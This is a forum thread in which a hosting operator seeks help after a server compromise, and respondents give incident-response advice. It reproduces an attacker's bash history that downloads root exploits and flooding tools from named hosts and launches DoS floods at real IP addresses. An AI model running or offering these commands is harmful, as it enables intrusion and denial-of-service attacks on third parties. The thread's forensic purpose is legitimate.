/usr/local/cpanel/3rdparty/mailman/pythonlib/korean/python
/usr/local/cpanel/3rdparty/mailman/messages
/usr/local/cpanel/3rdparty/mailman/messages/cs
/usr/local/cpanel/3rdparty/mailman/messages/cs/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/da
/usr/local/cpanel/3rdparty/mailman/messages/da/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/de
/usr/local/cpanel/3rdparty/mailman/messages/de/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/es
/usr/local/cpanel/3rdparty/mailman/messages/es/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/et
/usr/local/cpanel/3rdparty/mailman/messages/et/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/eu
/usr/local/cpanel/3rdparty/mailman/messages/eu/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/fi
/usr/local/cpanel/3rdparty/mailman/messages/fi/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/fr
/usr/local/cpanel/3rdparty/mailman/messages/fr/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/hu
/usr/local/cpanel/3rdparty/mailman/messages/hu/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/it
/usr/local/cpanel/3rdparty/mailman/messages/it/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/ja
/usr/local/cpanel/3rdparty/mailman/messages/ja/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/ko
/usr/local/cpanel/3rdparty/mailman/messages/ko/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/lt
/usr/local/cpanel/3rdparty/mailman/messages/lt/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/nl
/usr/local/cpanel/3rdparty/mailman/messages/nl/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/no
/usr/local/cpanel/3rdparty/mailman/messages/no/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/pl
/usr/local/cpanel/3rdparty/mailman/messages/pl/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/pt
/usr/local/cpanel/3rdparty/mailman/messages/pt/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/pt_BR
/usr/local/cpanel/3rdparty/mailman/messages/pt_BR/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/ru
/usr/local/cpanel/3rdparty/mailman/messages/ru/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/sr
/usr/local/cpanel/3rdparty/mailman/messages/sr/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/sv
/usr/local/cpanel/3rdparty/mailman/messages/sv/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/uk
/usr/local/cpanel/3rdparty/mailman/messages/uk/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/ca
/usr/local/cpanel/3rdparty/mailman/messages/ca/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/hr
/usr/local/cpanel/3rdparty/mailman/messages/hr/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/ro
/usr/local/cpanel/3rdparty/mailman/messages/ro/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/sl
/usr/local/cpanel/3rdparty/mailman/messages/sl/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/tr
/usr/local/cpanel/3rdparty/mailman/messages/tr/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/tests
/usr/local/cpanel/3rdparty/mailman/tests/bounces
/usr/local/cpanel/3rdparty/mailman/tests/msgs
/usr/local/cpanel/3rdparty/mailman/suspended.lists
/usr/local/cpanel/3rdparty/phpMyAdmin
/usr/local/cpanel/3rdparty/phpMyAdmin/CVS
/usr/local/cpanel/3rdparty/phpMyAdmin/images
/usr/local/cpanel/3rdparty/phpMyAdmin/images/CVS
/usr/local/cpanel/3rdparty/phpMyAdmin/lang
/usr/local/cpanel/3rdparty/phpMyAdmin/lang/CVS
/usr/local/cpanel/3rdparty/phpMyAdmin/libraries
/usr/local/cpanel/3rdparty/phpMyAdmin/libraries/CVS
/usr/local/cpanel/3rdparty/phpMyAdmin/scripts
/usr/local/cpanel/3rdparty/phpMyAdmin/scripts/CVS
/usr/sbin/sendmail
/usr/sbin/utempter
/etc/proftpd
find: /proc/3209/fd: No such file or directory
find: /proc/6268/fd: No such file or directory
find: /proc/25154/fd/4: No such file or directory

That is all...something bad?

Thank you very much...

Well it's pretty clear that the system has been cracked. Vadmin and udp.pl are flooders used in DoS attacks. Since new files were uploaded, I'm guessing that you have not taken the system offline. Let me be clear about this:

Your system is being used to attack other computers. You MUST take it offline NOW and leave it offline until you are sure that it is clean!

In fact, if you look at the process you've listed, you can see the IP address of the system you're being used to attack.

Get a listing of all currently running processes and check the integrity of rpms with rpm -Va. once you've got the system offline, you can either remove the compromised systems hard-drive, replace it with a new one, then format and re-install from trusted media or you can make an image of the drive using something like dd, then wipe the compromised drive by completely re-formatting and re-installing from trusted media (not from a back up). You can then get the system back online. I would HIGHLY recommend you spend some time properly securing the system before putting it back online, otherwise you'll probably be doing this again sometime soon.

If you want to do any kind of further analysis, boot your system with a cd-rom based linux distro like knoppix or FIRE and then mount the compromised hd, read-only. You can then take a look at the filesystem, system logs, and root's bash_history. You might also want to take a look at the ikonboard.cgi file (ikonboard is a bulletin board app), especially if you are not running ikonboard. Btw, you said both ikonboard and udp.pl were running under the same user, but your never said what user that is.

Big problme, that is BIG PROBLEEEEM....offline, f***...

Yes...user...he run it every time with same username (one site) and evry time in "var/tmp", before I run "scripts/securetmp" he run it in "tmp"!!!
But THAT SITE IS MY SITE!! Yes, I change password, that don`t help!
In logs for that site I can`t find nothing!

Also, I can`t remove HD, server is not my, I pay one company for that server...
But, I have much sites on that server....and some of that sites is not my!
How much time server must be offline and can I restore all accounts and data for all sites?

This can be big problem, somebody can think that I attack that servers...and I can lose this server from this company!

Also, yes, I use ikonboard board!

Have you tried looking at the users bash history or just removing the user entirely? Have you contacted the user and asked him wtf he's doing?

FWIW, /var/tmp is often writable to normal users (check /var/tmp permissions) and if you allow normal users to have access to /usr/sbin/perl, they'll be able to run that udp.pl script without needing root access.

Let this be a lesson to people to make your /tmp and /var directories on a seperate partition and add the noexec flag to fstab. That will stop a heck of a lot of script kiddies in their tracks.

Yes, yes yes.....I find it I find it......in ".bash_history" for this account I find this:
kill
29515 kill 29515
kill 29515
ls
ls
cd /tmp
ls
rm *
ls
cd /var/tmp
ls
uanem -a
uname -a
wget http://www.kpteam.org/xpl/w00t.zip
unzip http://www.kpteam.org/xpl/w00t.zip
unzip w00t.zip
chmod +x w00t
./w00t
id
wget http://www.rootthief.com/binarys/mremap_pte
chmod +x mremap_pte
./mremap_pte
id
wget http://www.rootthief.com/binarys/NmapYa
chmod +x NmapYa
./NmapYa
id
nmap
./ NmapYa
wget http://www.rootthief.com/binarys/cvs
chmod +x cvs
./cvs
./cvs
./cvs forum.aboutpc.net
ls
rm *
ls
wget http://www.rootthief.com/binarys/ptrace
chmod +x ptrace
./ptrace
id
./ptrace; id
ls
ps
kill 23425
rm *
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
unzip vadimI.zip
rm vadimI.zip
chmod +x vadimI
./vadimI
./vadimI 200.214.14.71 80 200.214.14.7
ps
kill 27391
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x f3
ls
./vadimI 200.164.65.34 80 200.164.65.3
./f3 200.216.161.140 10000 200
ps
kill 31240
ps
ps
ps
ps
ps
ps
kill -9 31239
kill -9 31240
ps
./f3 161.24.72.80
./f3 161.24.72.80 1000 200
id
ps
./vadimI 200.216.161.140 59 200.216.161.14
w
w
ls
id
uname -a
wget http://www.portalsecurityall.hpg.ig.com.br/exploits/PT
chmod +x PT
./PT
id
rm PT
exit
wget http://www.portalsecurityall.hpg.ig....3.10ALPHA7.tgz
ls
rm -rf nmap-3.10ALPHA7.tgz
ls
wget http://www.malukinhow.com/mirc615.exe
ls
rm -rf mirc615.exe
ls
id
ls
ps
./f3
w
ls
./vadimI 200.165.49.5 80 200.165.49.1
ps
ls
./f3
./f3 200.247.39.196
./f3 200.247.39.196 1000 600
id
./f3 200.247.39.196 1000 600
ls
ps
kill 18353
kill 18354
kill 19787
ls
ps
kill -9 18354
kill -9 18353
ps
./f3 200.247.39.196 1000 600
ps
kill -9 21132
ps
./f3 66.90.87.13 1000 600
ps
kill -9 21911
./vadimI 66.90.87.13 1286 66.90.87.1
w
ls
ls -a
ps
exit
ls
ls -a
mkdir ....
cd ....
ls
ls
pwd
w
wget http://www.aloysio.hpg.ig.com.br/f3
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
unzip vadimI.zip
chmod +x *
ls
rm -rf vadimI.zip
id
./f3
./f3 200.154.201.39 1000 200
ls
ls -a
cd ....
./f3 200.154.201.39 1000 200
id
ps
cd ....
ls
./vadimI 66.45.239.202 6005 66.45.239.20
id
./vadimI 66.45.239.202 6005 66.45.239.20
ps
./f3 201.7.10.73 1000 40
cd ....
./f3 201.7.10.73 1000 40
./vadimI 201.7.10.73 139 201.7.10.73
ps
kill 291243
kill 29124
ps
cd ...
cd ....
./f3 201.7.10.73 10000 100
ps
kill -9 29558
ps
ls
cd ....
./vadimI 200.158.190.101 2004 200.158.190.10
ls
cd ....
ls
ls -a
ps
mkdir .i
cd .i
ls
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x *
ls
./f3
./f3 201.7.89.160 1000 100
ls
wget http://www.enzotech.net/code/neuter.c
ps
kill 15818
ps
w
ls
cd .i
ls
./f3 200.222.176.13 100 10
ls
cd .i
ls
./f3 200.180.52.203 200 300
./f3 200.180.52.203 1000 200
lynx
ls
lynx http://www.rootthief.com/binarys/mremap_pte
w
ls
pwd
cd ....
ls -a
mkdir ...
cd ...
ls
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x *
./f3
./f3 200.140.88.186 500 300
ps
w
ls -a
pwd
mkdir .s
cd .s
wget http://www.aloysio.hpg.ig.com.br/f3
ls
ls -a
cd .s
ls
ps
kill 21493
ps
wget http://www.aloysio.hpg.ig.com.br/f3
./f3 200.228.76.178 500 180
chmod +x f3
./f3 200.228.76.178 500 180
id
cd .s
./f3 200.97.201.28 500 180
./f3 200.97.201.28 500 300
ls
ls -a
mkdir .l
cd .l
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
unzip vadimI.zip
chmod +x vadimI
./vadimI
ls
./vadimI 66.221.169.110 80 66.221.169.11
ps
kill 20441
ps
kill -9 20322
ps
kill -9 20323
ps
cd .l
ls
./vadimI 66.221.169.110 80 66.221.169.110
./vadimI 66.235.202.52 80 66.235.202.5
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x f3
./f3
./f3 200.221.8.44 500 300
./f3 200.226.137.9 1000 300
./f3 200.223.39.2 1000 100
ls
cd .l
./vadimI
./vadimI 200.192.176.133 80 200.192.176.133
ps
kill 15811
kill -9 14844
kill -9 14845
kill -9 14844
kill -9 15535
ls
ls -a
w
tty
uname -a
ping
mkdir .k
cd .k
ls
wget http://www.luckyan.com/r00t/flood.tgz
tar xfv flood.tgz
tar xzvf flood.tgz
cd dos
ls
./slice2
chmod +x *
./slice2
cd ..
wget http://mihai-doini.org/flood.tgz
ls
rm *
wget http://mihai-doini.org/flood.tgz
tar xzvf flood.tgz
cd flood
ls
chmod +x
chmod +x *
./sl
ls
ls s*
./slice3
./sl3
./stream
ls
./xdestroy
./udp
./juno
./juno 200.222.173.87 139
./xshock
ls
./rc8
./rc8 200.222.173.87
./rc8 200.222.173.87 200.222.173.87
./s
ls
./smack
./smack 200.222.173.87
./alpha
./alpha 200.222.173.87 139 200.222.173.87
l
ls
./nestea
./da.sh
ls
ls -a
cd .k
ls
rm -rf f*
cd dos
ls
mv vadimI ..
cd ..
ls
rm -rf dos
ls
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x f3
ls
./vadimI 200.188.191.131 80 200.188.191.13
./vadimI 200.188.191.131 80 200.188.191.13
./f3 200.188.191.131 1000 300
./f3 200.188.191.131 1000 300
ps
kill -9 11654
kill -9 15977
ps
./vadimI 200.208.28.224 80 200.208.28.22
ps
kill 16235
ps
./vadimI 200.188.191.131 53 200.188.191.13
cd .k
ls
./vadimI 200.188.191.131 53 200.188.191.13
cd .k
./f3 200.99.102.226
./f3 200.99.102.226 500 300
./f3 200.99.102.226 1000 300
./f3 200.99.102.226 1000 300
ls
ls -a
ps
setterm -file `perl -e 'print "A"x249'`
setterm
setterm -file `perl -e 'print "A"x249'`
./vadimI 66.90.122.94 6667 66.90.122.80
cd ....
./vadimI 66.90.122.94 6667 66.90.122.80
./vadimI 66.90.122.94 6667 66.90.122.80
id
ls
ls -a
cd ....
ls
wget http://nene.nu/c4
chmod +x c4
./c4
./c4 66.90.122.94 -p 6665,6667
./c4 66.90.122.94 -p 6665,6667
./c4 66.90.122.94
./c4 -h 66.90.122.94 -p 6665,6667
cd ....
ls
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x *
./f3
./f3 66.90.122.94 1000 300
ls
./vadimI 207.44.244.102 80 207.44.244.10
ps
ls
ls -a
wget eagle.kecapi.com/sec/codes/phpmy-explt.c
gcc -o phpmyphpmy-explt.c
mkdir ....
mv phpmy-explt.c ....
cd ....
ls
gcc
traceroute
ls -a
mkdir .h
ls -a
cd .h
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
wget http://www.aloysio.hpg.ig.com.br/f3
ls
unzip vadimI.zip
./v
rm -rf *.zip
chmod +x *
./v
./vadimI
./f3216.239.39.10465535 600
./f3 200.152.253.20 1000 600
id
uanme -a
showmount
ls
ls -a
pwd
ps
ls
ls -a
mkdir .c
cd .c
pwd
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
unzip vadimI.zip
wget http://www.aloysio.hpg.ig.com.br/f3
rm *.zip
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
rm *.zip
chmod +x *
ls
./vadimI 24.61.211.193 80 24.61.211.19
w
ls
ps
ps
ps
ls
ls -a
mkdir .l
cd .l
wget http://packetstormsecurity.nl/DoS/udp.pl
chmod +x *
./udp.pl
./udp 200.222.175.87 139 1
./udp.pl 200.222.175.87 139 1
3ps
ps
cd ....
ls
perl udp.pl 200.222.169
ls
ls -pa
ls -a
mkdir ....
cd ....
wget http://geocities.yahoo.com.br/mat_ad0r/udp.pl
chmod +x *
./udp.pl 201.5.121
perl udp.pl 201.5.121
ps
killall -9 perl
ps
ls
cd ....
ls
rm u*
ls
ps
killall -9 vadimI
ps
ls -a
cd ....
ls
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
unzip vadimI.zip
chmod +x *
rm *.zip
ls
./vadimI 200.103.98.206 6667 200.103.98.20
./vadimI 200.103.98.206 6667 200.103.98.20
./vadimI 200.103.98.206 6667 200.103.98.20
ls
ls -a
cd ....
ls
./vadimI 66.90.84.99 6667 66.90.84.9

but but but, THAT IS MY ACCOUNT!!!!
How he do this? He have SSH access or what? What I can do now? Disable SSH for this account, can I disable all SSH access for this account in WHM....
But I change password for this account....
He use some bad PHP/PERL script for this or what, how I can find that....?
Thanks.

Quote:

He have SSH access or what? What I can do now? Disable SSH for this account, can I disable all SSH access for this account in WHM

Read Capt_caveman's red-lettered advice. Take the system off the net.

Your best bet would be to put in a fresh system that is armoured to the teeth.

The attacker could have made several ways availabe to her(him)self to regain access to your system. So, disabling ssh or changing your password or root password may not be entirely effective.

The bash_history shows a mix of downloading DoS tools and Linux root exploits (ie. mremap and ptrace) as well as creation of a number of "hidden" dirs like ... or .l or .k etc. From the bash_history, it's hard to tell if any of the priviledge escalation attacks were successfull. Again, check the system logs for any application/kernel errors, oops, segfaults, or panics.

As far as how access is attained, that depends on what services are being run (ssh,telnet,etc). Take a look at the output of last and at /var/log/secure and look for abnormal login info or logins that corresponded to odd activity. You can try turning off ssh, but I was assuming that's how you accessed the system. You can try denying the user access by modifying the sshd config file and adding the DenyUsers <username> directive. Though i'd assume since you are the compromised user, that you'd lock yourself out. If you have an alternative account then you'd still be able to login (just don't tell me it's root).

So far you haven't really given us enough info to say how access to your account was attained. It could be a sniffed password, insecure cgi script, some other vuln...hard to say exactly without any real evidence.

Yes, on my server he can access with ssh/telnet...
When I edit var/log/secure I find:
Jul 16 19:50:01 plain sshd[13887]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13888]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13889]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13914]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13890]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13892]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13915]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13916]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13891]: Did not receive identification string from IP
Jul 16 19:50:01 plain sshd[13893]: Did not receive identification string from IP

every few days I have this...or every day...

Yes, I can`t turn off ssh...but I can add "DenyUsers <username> "
Yes, I have root access....

Also, if I good see in .bash_history, he directly work in /var/tmp, he don`t change dir (cd some_somedir, cd .. ...), he only create one folder, download file, extract and execute that file...

Will you please take your bloody server offline already!

No, I can`t do that for to much time...I`ll lose all on what I work very much time...and also I have people who pay to me...

Can somebody tell to me how I can disable WGET for this account (only one account)? Not for all accounts!

This can help....also, I change some more thing and I`ll now edit all scripts for that account!

Thanks

Ok, so you're renting this server off of another company, and providing hosting services to many sites. So people are paying you to provide a reliable service, but atm you're knowingly allowing another companies machines to participate in Denial of Service attacks on other internet users.

You MUST inform your server provider of the break in, and ask them to backup your data and reinstall the OS, as the Mods here have told you repeatedly. You wont have anything if this guy decideds to completely take control of your precious server and all it's hosted sites, so show some action, NOW!

Quote:

Originally posted by xmanxl
No, I can`t do that for to much time...I`ll lose all on what I work very much time...and also I have people who pay to me...

OK, by refusing to take the system offline to fix the problem, you are continuing to put yourself and possibly the people who pay you at risk.

The bug where in the php of your site. Turn on safe_mode in your php.ini config file then restart the apache. Locate any suspicious .php files in yout web server that have functions system.. and search the string wget in yout apache logs, to finde the ip invasor.

Upgrade the version of your kernel, in som version of kernels 2.4 have one bug that allow to exploit the kernel and gain root acces. Verify the ports open on your system and if have suspicious executables in ps.

Regards.